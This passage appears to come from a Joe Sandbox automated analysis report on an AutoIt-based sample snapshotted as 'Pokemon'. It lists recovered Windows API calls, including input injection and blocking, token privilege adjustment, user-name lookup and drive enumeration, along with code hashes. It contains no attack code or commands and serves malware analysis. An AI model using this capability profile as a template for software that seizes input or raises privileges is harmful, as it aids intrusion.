                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 000C2A94
                                                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 000C2AA1
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 91a0b0bdd319ae13027682ab9f7c74cb8740d0ebfa4dd3df19c9676876ad3eb3
                                                                                                                                                                                                                                                                                      • Instruction ID: f2292832c69d39255a4d68782efeaf04f8b58a59b5d7663518868f4f4a5829b7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91a0b0bdd319ae13027682ab9f7c74cb8740d0ebfa4dd3df19c9676876ad3eb3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD319575901228ABCB61DF68D989BDDBBB8BF08310F5041DAE81CA6261E7709F858F45
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B014B: __CxxThrowException@8.LIBVCRUNTIME ref: 000B09D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B014B: __CxxThrowException@8.LIBVCRUNTIME ref: 000B09F5
                                                                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000F205A
                                                                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000F2087
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000F2097
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 790228ccc3cec791196b19934e8dc57451ce17a9b27afb36c5b93d61ab92c0bc
                                                                                                                                                                                                                                                                                      • Instruction ID: c544c03988519998a47a5d28a87456f282efab8e15286b26e757f290c6db323c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 790228ccc3cec791196b19934e8dc57451ce17a9b27afb36c5b93d61ab92c0bc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32118FB2414205BFD728AF54EC86DABB7B8EB44710B20851EF15657652DB70BC82CA64
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,000B502E,?,001598D8,0000000C,000B5185,?,00000002,00000000), ref: 000B5079
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,000B502E,?,001598D8,0000000C,000B5185,?,00000002,00000000), ref: 000B5080
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 000B5092
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 000EE664
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                                                                                                      • String ID: X64
                                                                                                                                                                                                                                                                                      • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001152EE,?,?,00000035,?), ref: 00104229
                                                                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001152EE,?,?,00000035,?), ref: 00104239
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000FBC24
                                                                                                                                                                                                                                                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 000FBC37
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000F1B48), ref: 000F1A20
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,000F1B48), ref: 000F1A35
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 0010F51A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 000FEC95
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,000B075E), ref: 000B0D4A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0011358D
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 001135A0
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 001135AF
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 001135CA
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 001135D1
                                                                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00113700
                                                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0011370E
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00113755
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00113761
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0011379D
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001137BF
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001137D2
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001137DD
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 001137E6
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001137F5
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 001137FE
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00113805
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00113810
                                                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00113822
                                                                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00130C04,00000000), ref: 00113838
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00113848
                                                                                                                                                                                                                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0011386E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0011388D
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001138AF
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00113A9C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                      • Opcode ID: 386931fff16465e0144074a1b56bcb5e67761c0da7049af6530fec031a627100
                                                                                                                                                                                                                                                                                      • Instruction ID: eabeefd3f2c7f03ee21f5c3e063c15a39d6504b10f79d7a8ed22cf138e1745d3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 386931fff16465e0144074a1b56bcb5e67761c0da7049af6530fec031a627100
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9027C71900215BFDB14DF64DC89EAE7BB9FF49310F108158F915AB6A1CB74AE81CB60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00127B67
                                                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00127B98
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00127BA4
                                                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00127BBE
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00127BCD
                                                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00127BF8
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000010), ref: 00127C00
                                                                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00127C07
                                                                                                                                                                                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00127C16
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00127C1D
                                                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00127C68
                                                                                                                                                                                                                                                                                      • FillRect.USER32(?,?,?), ref: 00127C9A
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00127CBC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: GetSysColor.USER32(00000012), ref: 00127E5B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: SetTextColor.GDI32(?,00127B2D), ref: 00127E5F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: GetSysColorBrush.USER32(0000000F), ref: 00127E75
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: GetSysColor.USER32(0000000F), ref: 00127E80
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: GetSysColor.USER32(00000011), ref: 00127E9D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00127EAB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: SelectObject.GDI32(?,00000000), ref: 00127EBC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: SetBkColor.GDI32(?,?), ref: 00127EC5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: SelectObject.GDI32(?,?), ref: 00127ED2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00127EF1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00127F08
                                                                                                                                                                                                                                                                                        • Part of subcall function 00127E22: GetWindowLongW.USER32(?,000000F0), ref: 00127F15
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ae4ad250b2f1f7fdfdd4e0c5fd08f55237b221d4c74f005e24ec2cc158432c50
                                                                                                                                                                                                                                                                                      • Instruction ID: 79551cea18c4fdad8827619223a273e3bda1b824031b53f3369f7f2725a9ca45
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae4ad250b2f1f7fdfdd4e0c5fd08f55237b221d4c74f005e24ec2cc158432c50
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DA1C272008311BFCB219F64EC48E6BBBB9FF48320F100A19F962965E0D775D9A6CB51
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?), ref: 000916B4
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 000D2B07
                                                                                                                                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000D2B40
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000D2F85
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00091488,?,00000000,?,?,?,?,0009145A,00000000,?), ref: 00091865
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 000D2FC1
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000D2FD8
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 000D2FEE
                                                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 000D2FF9
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 9617504f2b6e3b9f84111da1e3846cc56fc6c1ba96ed0bf741b3ec51a43657e7
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d2e1a708b70134050402d8de24ab6381c8244467b7600ddc5cdb33259da3cfa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9617504f2b6e3b9f84111da1e3846cc56fc6c1ba96ed0bf741b3ec51a43657e7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C12E930608312AFCB65CF14D894BA9BBF1FB94304F18452AF495DB662C771AC92DFA1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0011319B
                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001132C7
                                                                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00113306
                                                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00113316
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0011335D
• GetClientRect.USER32(00000000,?), ref: 00113369
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001133B2
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001133C1
• GetStockObject.GDI32(00000011), ref: 001133D1
• SelectObject.GDI32(00000000,00000000), ref: 001133D5
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001133E5
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 001133EE
• DeleteDC.GDI32(00000000), ref: 001133F7
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00113423
• SendMessageW.USER32(00000030,00000000,00000001), ref: 0011343A
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0011347A
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0011348E
• SendMessageW.USER32(00000404,00000001,00000000), ref: 0011349F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001134D4
• GetStockObject.GDI32(00000011), ref: 001134DF
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001134EA
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001134F4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00105532
• GetDriveTypeW.KERNEL32(?,0012DC30,?,\\.\,0012DCD0), ref: 0010560F
• SetErrorMode.KERNEL32(00000000,0012DC30,?,\\.\,0012DCD0), ref: 0010577B
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
APIs
• GetCursorPos.USER32(?), ref: 00121BC4
• GetDesktopWindow.USER32 ref: 00121BD9
• GetWindowRect.USER32(00000000), ref: 00121BE0
• GetWindowLongW.USER32(?,000000F0), ref: 00121C35
• DestroyWindow.USER32(?), ref: 00121C55
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00121C89
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00121CA7
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00121CB9
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00121CCE
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00121CE1
• IsWindowVisible.USER32(00000000), ref: 00121D3D
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00121D58
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00121D6C
• GetWindowRect.USER32(00000000,?), ref: 00121D84
• MonitorFromPoint.USER32(?,?,00000002), ref: 00121DAA
• GetMonitorInfoW.USER32(00000000,?), ref: 00121DC4
• CopyRect.USER32(?,?), ref: 00121DDB
• SendMessageW.USER32(00000000,00000412,00000000), ref: 00121E46
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
APIs
• CharUpperBuffW.USER32(?,?), ref: 00120D81
• _wcslen.LIBCMT ref: 00120DBB
